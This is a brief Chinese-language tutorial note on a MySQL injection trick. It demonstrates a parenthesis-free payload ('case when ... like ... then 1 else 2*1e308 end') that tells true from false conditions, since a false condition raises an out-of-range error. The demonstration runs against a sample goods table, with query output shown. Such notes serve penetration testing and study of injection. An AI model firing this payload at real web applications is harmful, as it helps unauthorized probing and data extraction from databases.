0x00 概要
只能用来证明是注入的方法
因为出现不了 ( )括号, 导致很多函数与方法都使用不了
0x00 记忆方式
case when ‘12345’like’1%’ then’1’else 2*1e308 end
0x01 测试数据
mysql> select user();
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select * from tdb_goods where goods_id=1;
+----------+----------------------------+------------+------------+-------------+---------+------------+
| goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff |
+----------+----------------------------+------------+------------+-------------+---------+------------+
| 1 | R510VC 15.6英寸笔记本 | 笔记本 | 华硕 | 3399.000 | 1 | 0 |
+----------+----------------------------+------------+------------+-------------+---------+------------+
1 row in set (0.00 sec)
0x01 测试
// 正确的情况
// 会返回原来的数据页面保持不变
mysql> select * from tdb_goods where goods_id=1 and case when '12345'like'1%' then'1'else 2*1e308 end;
+----------+----------------------------+------------+------------+-------------+---------+------------+
| goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff |
+----------+----------------------------+------------+------------+-------------+---------+------------+
| 1 | R510VC 15.6英寸笔记本 | 笔记本 | 华硕 | 3399.000 | 1 | 0 |
+----------+----------------------------+------------+------------+-------------+---------+------------+
1 row in set (0.00 sec)
// 错误的情况
// 页面会爆错,如果关闭了错误提示,页面的数据会为空
mysql> select * from tdb_goods where goods_id=1 and case when '12345'like'66%' then'1'else 2*1e308 end;
ERROR 1690 - DOUBLE value is out of range in '(2 * 1e308)'